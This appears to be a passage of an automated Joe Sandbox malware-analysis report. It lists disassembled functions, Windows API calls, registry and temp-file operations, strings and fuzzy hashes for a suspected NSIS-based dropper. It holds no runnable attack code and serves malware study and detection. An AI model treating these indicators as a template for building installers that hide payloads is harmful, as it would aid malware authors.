                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                              • String ID: C:\Users\user~1\AppData\Local\Temp\nss7012.tmp\nsExec.dll$C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto$ExecToStack$artikulationer\Udsorteringerne
                                                                                                                                              • API String ID: 1941528284-611024608
                                                                                                                                              • Opcode ID: 024041f0cf3f6ab180763ea1ae22c75af16c428f23fa9b29c0d9da4ba2c35ac7
                                                                                                                                              • Instruction ID: 6fe11ac43b73c0a2a9a7664c997375d2890861868a1009608a3dd96d2534e176
                                                                                                                                              • Opcode Fuzzy Hash: 024041f0cf3f6ab180763ea1ae22c75af16c428f23fa9b29c0d9da4ba2c35ac7
                                                                                                                                              • Instruction Fuzzy Hash: B141B531900515BFCF10BBB5CC46DAE7679EF05328B20823BF422B51E1DB3C86529A6E

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 626 4052e2-4052f7 627 4052fd-40530e 626->627 628 4053ae-4053b2 626->628 629 405310-405314 call 4061a5 627->629 630 405319-405325 lstrlenW 627->630 629->630 632 405342-405346 630->632 633 405327-405337 lstrlenW 630->633 635 405355-405359 632->635 636 405348-40534f SetWindowTextW 632->636 633->628 634 405339-40533d lstrcatW 633->634 634->632 637 40535b-40539d SendMessageW * 3 635->637 638 40539f-4053a1 635->638 636->635 637->638 638->628 639 4053a3-4053a6 638->639 639->628
                                                                                                                                              APIs
                                                                                                                                              • lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
                                                                                                                                              • lstrlenW.KERNEL32(00402E19,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
                                                                                                                                              • lstrcatW.KERNEL32(Completed,00402E19,00402E19,Completed,00000000,00000000,00000000), ref: 0040533D
                                                                                                                                              • SetWindowTextW.USER32(Completed,Completed), ref: 0040534F
                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
                                                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
                                                                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                              • String ID: Completed
                                                                                                                                              • API String ID: 2531174081-3087654605
                                                                                                                                              • Opcode ID: 249834775a828849fb4d2b6e85db5a2f2ebd467982b82e73c19976ad16bb4df1
                                                                                                                                              • Instruction ID: 5ed309c8d3f1bf46da027166848d039c97de4a2eecd53fde705ce25c05ecf2d8
                                                                                                                                              • Opcode Fuzzy Hash: 249834775a828849fb4d2b6e85db5a2f2ebd467982b82e73c19976ad16bb4df1
                                                                                                                                              • Instruction Fuzzy Hash: 4A21B075900618BBCB119FA5DD44ACFBFB8EF84390F10803AF904B62A0C7B94A51DF68

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 640 4057b1-4057fc CreateDirectoryW 641 405802-40580f GetLastError 640->641 642 4057fe-405800 640->642 643 405829-40582b 641->643 644 405811-405825 SetFileSecurityW 641->644 642->643 644->642 645 405827 GetLastError 644->645 645->643
                                                                                                                                              APIs
                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user~1\AppData\Local\Temp\), ref: 004057F4
                                                                                                                                              • GetLastError.KERNEL32 ref: 00405808
                                                                                                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040581D
                                                                                                                                              • GetLastError.KERNEL32 ref: 00405827
                                                                                                                                              Strings
                                                                                                                                              • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004057D7
                                                                                                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004057D8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                              • String ID: C:\Users\user~1\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
                                                                                                                                              • API String ID: 3449924974-875112913
                                                                                                                                              • Opcode ID: 7075ef3404a36deb5860a48c063ce1528caeb3231ff3312c7ad9e757cbb6b53e
                                                                                                                                              • Instruction ID: 9d8b3aa145bda6eaeb46bbd44b0caf250caa68881350f4f3315e0aaa1c0c1a31
                                                                                                                                              • Opcode Fuzzy Hash: 7075ef3404a36deb5860a48c063ce1528caeb3231ff3312c7ad9e757cbb6b53e
                                                                                                                                              • Instruction Fuzzy Hash: 400108B1D00619EADF10DBA0D9087EFBFB8EF04314F00803AD945B6190D77996588FA9

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 646 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 653 4023c7-4023cf 646->653 654 402a4c-402a5b 646->654 655 4023d1-4023de call 402bbf lstrlenW 653->655 656 4023e2-4023e5 653->656 655->656 660 4023f5-4023f8 656->660 661 4023e7-4023f4 call 402ba2 656->661 664 402409-40241d RegSetValueExW 660->664 665 4023fa-402404 call 4030e7 660->665 661->660 667 402422-4024fc RegCloseKey 664->667 668 40241f 664->668 665->664 667->654 668->667
                                                                                                                                              APIs
                                                                                                                                              • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                                                                              • lstrlenW.KERNEL32(artikulationer\Udsorteringerne,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                                                              • RegSetValueExW.ADVAPI32(?,?,?,?,artikulationer\Udsorteringerne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,artikulationer\Udsorteringerne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseCreateValuelstrlen
                                                                                                                                              • String ID: artikulationer\Udsorteringerne
                                                                                                                                              • API String ID: 1356686001-2681483848
                                                                                                                                              • Opcode ID: 6e5ea9d93eb3cb9a957931279c0ba2d85e54e050eb0ba23687cbe03c42da21f9
                                                                                                                                              • Instruction ID: 75ab489ca3c386883e02df54fe3069bb457763bdb47647990c5a7a2e11d383c6
                                                                                                                                              • Opcode Fuzzy Hash: 6e5ea9d93eb3cb9a957931279c0ba2d85e54e050eb0ba23687cbe03c42da21f9
                                                                                                                                              • Instruction Fuzzy Hash: B8118E71A00108BFEB10AFA5DE89EAE777DEB44358F11403AF904B71D1D6B85E409668

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 671 402bff-402c28 RegOpenKeyExW 672 402c93-402c97 671->672 673 402c2a-402c35 671->673 674 402c50-402c60 RegEnumKeyW 673->674 675 402c62-402c74 RegCloseKey call 406559 674->675 676 402c37-402c3a 674->676 683 402c76-402c85 675->683 684 402c9a-402ca0 675->684 678 402c87-402c8a RegCloseKey 676->678 679 402c3c-402c4e call 402bff 676->679 681 402c90-402c92 678->681 679->674 679->675 681->672 683->672 684->681 686 402ca2-402cb0 RegDeleteKeyW 684->686 686->681 688 402cb2 686->688 688->672
                                                                                                                                              APIs
                                                                                                                                              • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402C20
                                                                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Close$DeleteEnumOpen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1912718029-0
                                                                                                                                              • Opcode ID: ee17cb36fc74d046e0919beb455f6a1255652c66a39e7c6080990b88bc0e6a76
                                                                                                                                              • Instruction ID: 55d087fd23a1ea4965d22b091416ffa41740a626a207a29a44af1da89c0b6843
                                                                                                                                              • Opcode Fuzzy Hash: ee17cb36fc74d046e0919beb455f6a1255652c66a39e7c6080990b88bc0e6a76
                                                                                                                                              • Instruction Fuzzy Hash: B3116771504118FFEF20AF90DF8CEAE3B79FB14384B10043AF905B20A0D7B48E55AA29

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 689 4031ef-403217 GetTickCount 690 403347-40334f call 402d9f 689->690 691 40321d-403248 call 40336e SetFilePointer 689->691 696 403351-403355 690->696 697 40324d-40325f 691->697 698 403261 697->698 699 403263-403271 call 403358 697->699 698->699 702 403277-403283 699->702 703 403339-40333c 699->703 704 403289-40328f 702->704 703->696 705 403291-403297 704->705 706 4032ba-4032d6 call 406698 704->706 705->706 707 403299-4032b9 call 402d9f 705->707 712 403342 706->712 713 4032d8-4032e0 706->713 707->706 714 403344-403345 712->714 715 4032e2-4032ea call 405e0a 713->715 716 403303-403309 713->716 714->696 719 4032ef-4032f1 715->719 716->712 718 40330b-40330d 716->718 718->712 720 40330f-403322 718->720 721 4032f3-4032ff 719->721 722 40333e-403340 719->722 720->697 723 403328-403337 SetFilePointer 720->723 721->704 724 403301 721->724 722->714 723->690 724->720
                                                                                                                                              APIs
                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403203
                                                                                                                                                • Part of subcall function 0040336E: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040306C,?), ref: 0040337C
                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403119,00000004,00000000,00000000,0040A230,?,00403093,000000FF,00000000,00000000,?,?), ref: 00403236
                                                                                                                                              • SetFilePointer.KERNELBASE(00A494B5,00000000,00000000,00414EF0,00004000,?,00000000,00403119,00000004,00000000,00000000,0040A230,?,00403093,000000FF,00000000), ref: 00403331
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FilePointer$CountTick
                                                                                                                                              • String ID: }UI
                                                                                                                                              • API String ID: 1092082344-1805939252
                                                                                                                                              • Opcode ID: 1d6b410ec908590b26d0e6386832776f3ccc0075e6ffb3c2499094a24fe2f275
                                                                                                                                              • Instruction ID: 2f989109dca0f14896005150ea4b142ee5491df85de4bcb3d025a191183ef828
                                                                                                                                              • Opcode Fuzzy Hash: 1d6b410ec908590b26d0e6386832776f3ccc0075e6ffb3c2499094a24fe2f275
                                                                                                                                              • Instruction Fuzzy Hash: 6F317A72500215DFCB109F69EEC496A3BAAF74475A714423FE900B22E0CB799D05DB9D

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 725 406050-406082 RegOpenKeyExW 726 4060c4-4060c7 725->726 727 406084-4060a3 RegQueryValueExW 725->727 728 4060b1 727->728 729 4060a5-4060a9 727->729 730 4060b4-4060be RegCloseKey 728->730 729->730 731 4060ab-4060af 729->731 730->726 731->728 731->730
                                                                                                                                              APIs
                                                                                                                                              • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,: Completed,?,004062C3,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 0040607A
                                                                                                                                              • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,004062C3,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 0040609B
                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,004062C3,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 004060BE
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                              • String ID: : Completed
                                                                                                                                              • API String ID: 3677997916-2954849223
                                                                                                                                              • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                                                              • Instruction ID: dd2034eab93442e05d5faf4c8c2bb259ab57cbcddbd304a2a07cf8a1e20057b8
                                                                                                                                              • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                                                              • Instruction Fuzzy Hash: 00015A3119020AEACF21CF26ED08EDB3BACEF44350F01403AF945D2260D735D968CBA6

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 732 405d87-405d93 733 405d94-405dc8 GetTickCount GetTempFileNameW 732->733 734 405dd7-405dd9 733->734 735 405dca-405dcc 733->735 737 405dd1-405dd4 734->737 735->733 736 405dce 735->736 736->737
                                                                                                                                              APIs
                                                                                                                                              • GetTickCount.KERNEL32 ref: 00405DA5
                                                                                                                                              • GetTempFileNameW.KERNELBASE(0040A230,?,00000000,?,?,?,00000000,004033B4,1033,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004035E2), ref: 00405DC0
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CountFileNameTempTick
                                                                                                                                              • String ID: C:\Users\user~1\AppData\Local\Temp\$nsa
                                                                                                                                              • API String ID: 1716503409-3083371207
                                                                                                                                              • Opcode ID: a547c736c8f6b5c9f15055ff18df3ea68e155a79a10597bb1e750add09701d99
                                                                                                                                              • Instruction ID: 39f60503b2430839de46f7700192694fdf55f3390a305a77e996ee432cf1c3a1
                                                                                                                                              • Opcode Fuzzy Hash: a547c736c8f6b5c9f15055ff18df3ea68e155a79a10597bb1e750add09701d99
                                                                                                                                              • Instruction Fuzzy Hash: 00F01D76701608BFDB108F59DD09A9BB7A8EFA5710F10803BEA41E7190E6B49A54CB64
                                                                                                                                              APIs
                                                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406504
                                                                                                                                              • wsprintfW.USER32 ref: 0040653F
                                                                                                                                              • LoadLibraryW.KERNELBASE(?), ref: 0040654F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
